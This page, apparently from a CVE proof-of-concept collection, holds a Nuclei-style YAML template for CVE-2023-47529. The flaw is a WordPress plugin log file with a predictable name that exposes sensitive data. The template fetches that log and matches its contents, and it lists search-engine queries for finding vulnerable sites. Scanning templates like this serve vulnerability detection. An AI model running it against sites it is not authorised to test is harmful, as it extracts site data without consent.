4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2023-47529.yaml YAML
id: CVE-2023-47529

info:
  name: "Cloud Templates & Patterns collection <= 1.2.2 - Sensitive Information Exposure via Log File"
  author: randomrobbiebf
  severity: medium
  description: "The Cloud Templates & Patterns collection plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.2 via a log file with a predictable name. This makes it possible for unauthenticated attackers to extract sensitive data."
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c59baad8-b888-4475-8371-645811a6b569
    - https://plugins.trac.wordpress.org/changeset/2976377/templates-patterns-collection/tags/1.2.3/includes/Logger.php
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-47529
  metadata:
    fofa-query: "wp-content/plugins/templates-patterns-collection/"
    google-query: inurl:"/wp-content/plugins/templates-patterns-collection/"
    shodan-query: 'vuln:CVE-2023-47529'
    slug: 'templates-patterns-collection'
  tags: cve,wordpress,wp-plugin,templates-patterns-collection,medium

http:
  - method: GET
    redirects: true
    max-redirects: 3
    path:
      - "{{BaseURL}}/wp-content/uploads/ti_theme_onboarding.log"



    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "WordPress Instance Info"
        part: body
        condition: and

      - type: word
        words:
          - "Home URL"
        part: body
        condition: and

      - type: word
        words:
          - "Onboarding"
        part: body
        condition: and